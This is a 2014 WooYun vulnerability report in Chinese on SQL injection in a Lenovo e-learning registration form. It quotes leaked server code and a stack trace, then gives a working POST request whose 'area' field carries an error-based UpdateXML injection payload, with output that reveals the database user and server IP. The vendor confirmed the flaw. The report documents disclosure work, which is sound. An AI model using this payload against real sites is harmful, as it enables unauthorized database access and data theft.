当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070495

漏洞标题:联想某分站sql注入漏洞

相关厂商:联想

漏洞作者: Ev1l

提交时间:2014-07-31 18:33

修复时间:2014-09-14 18:34

公开时间:2014-09-14 18:34

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-31: 细节已通知厂商并且等待厂商处理中
2014-08-01: 厂商已经确认,细节仅向厂商公开
2014-08-11: 细节向核心白帽子及相关领域专家公开
2014-08-21: 细节向普通白帽子公开
2014-08-31: 细节向实习白帽子公开
2014-09-14: 细节向公众公开

简要描述:

刚才发的川大6个洞竟然没过!!!!!!http://e-learning.lenovo.com.cn

详细说明:

http://e-learning.lenovo.com.cn
登陆的时候选择
联想员工注册
继续选择
零售业务同事注册

1.png


随便填,然后就直接注册就可以了
报错

2.png


截取部分代码

描述
include_once(/export/home/www/web/wwwroot/mail/smtpnew.php): failed to open stream: No such file or directory
源文件
/export/home/lenovo/wwwroot/protected/controllers/ItcodeController.php(142)
00130: $area_id = $_POST['area'];
00131: $sql = "insert into users (`username`, `password`, `realname`, `group_id`, `email`, `tel`, `status`, `college`, `area_id`) values ('{$username}', '{$password}', '{$realname}', '{$group_id}', '{$email}', '{$tel}', '{$status}', '{$college}','{$area_id}')";
00132: Yii::app()->db->createCommand($sql)->query();
00133: $id = Yii::app()->db->getLastInsertID();
00134: $sql = "replace into user_department (`user_id`, `department`) values ('{$id}', '{$department}')";
00135: Yii::app()->db->createCommand($sql)->query();
00136: $check = $this->getRandStr(8);
00137: $sql = "replace into user_check (`user_id`, `check`, `dateline`) values ('{$id}', '{$check}', '".time()."')";
00138: Yii::app()->db->createCommand($sql)->query();
00139:
00140: $url = "http://e-learning.lenovo.com.cn/itcode/check/uid/{$id}/k/{$check}";
00141: //发送邮件
00142: include_once('/export/home/www/web/wwwroot/mail/smtpnew.php');
00143: $m = new Mailer();
00144: $sendtitle = "Welcome to Lenovo E-Learing Platform";
00145: $sendinfo = "$realname 您好!<br><br>
00146:
00147: 您提交的联想e学堂注册申请已经通过审核,请点击此处<a href='{$url}' target='_blank'>{$url}</a>激活您的帐号。您的初始密码为123456,在您第一次使用自己的itcode登录时,会通过短信验证您的手机号码完成绑定。谢谢!<br><br>
00148:
00149: 联想e学堂项目组";
00150: $to = array($realname=>$email);
00151: $m->Send($to,$sendtitle,$sendinfo);
00152:
00153: //$to = array('lenovo_support'=>'lenovo_support@cnet.com.cn');
00154: //$to = array('gt2test'=>'gt2test@qq.com');
堆栈追踪
#0 /export/home/lenovo/wwwroot/protected/controllers/ItcodeController.php(142): actionLs()
#1 /export/home/lenovo/libs/framework/web/actions/CInlineAction.php(32): ItcodeController->actionLs()
#2 /export/home/lenovo/libs/framework/web/CController.php(300): CInlineAction->run()
#3 /export/home/lenovo/libs/framework/web/filters/CFilterChain.php(129): ItcodeController->runAction()
#4 /export/home/lenovo/libs/framework/web/filters/CFilter.php(41): CFilterChain->run()
#5 /export/home/lenovo/libs/framework/web/CController.php(1049): CAccessControlFilter->filter()
#6 /export/home/lenovo/libs/framework/web/filters/CInlineFilter.php(59): ItcodeController->filterAccessControl()
#7 /export/home/lenovo/libs/framework/web/filters/CFilterChain.php(126): CInlineFilter->filter()
#8 /export/home/lenovo/libs/framework/web/CController.php(283): CFilterChain->run()
#9 /export/home/lenovo/libs/framework/web/CController.php(257): ItcodeController->runActionWithFilters()
#10 /export/home/lenovo/libs/framework/web/CWebApplication.php(324): ItcodeController->run()
#11 /export/home/lenovo/libs/framework/web/CWebApplication.php(121): CWebApplication->runController()
#12 /export/home/lenovo/libs/framework/base/CApplication.php(135): CWebApplication->processRequest()
#13 /export/home/lenovo/wwwroot/index.php(15): CWebApplication->run()
2014-07-31 16:56:04 Apache/2.2.15 (CentOS) Yii Framework/1.1.3


通过分析我们知道,post获取的area直接insert进入数据库导致sql注入漏洞,如下:
POST http://e-learning.lenovo.com.cn/itcode/ls HTTP/1.1
------WebKitFormBoundarySlOvhQpJK5p4oKJc
Content-Disposition: form-data; name="realname"
obama3
------WebKitFormBoundarySlOvhQpJK5p4oKJc
Content-Disposition: form-data; name="email"
obama3
------WebKitFormBoundarySlOvhQpJK5p4oKJc
Content-Disposition: form-data; name="area"
' | UpdateXML(1,CONCAT(0x5b,mid((SELECT user()),1,32),0x5d),1))#
------WebKitFormBoundarySlOvhQpJK5p4oKJc
Content-Disposition: form-data; name="yt0"
注册
------WebKitFormBoundarySlOvhQpJK5p4oKJc--
返回
数据库用户:lenovo@101.251.239.170
见漏洞证明

漏洞证明:

2014-07-31 18:16:52 的屏幕截图.png

修复方案:

自己研究

版权声明:转载请注明来源 Ev1l@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-08-01 15:11

厂商回复:

感谢您对联想信息安全工作的支持,我们会尽快修复漏洞

最新状态:

暂无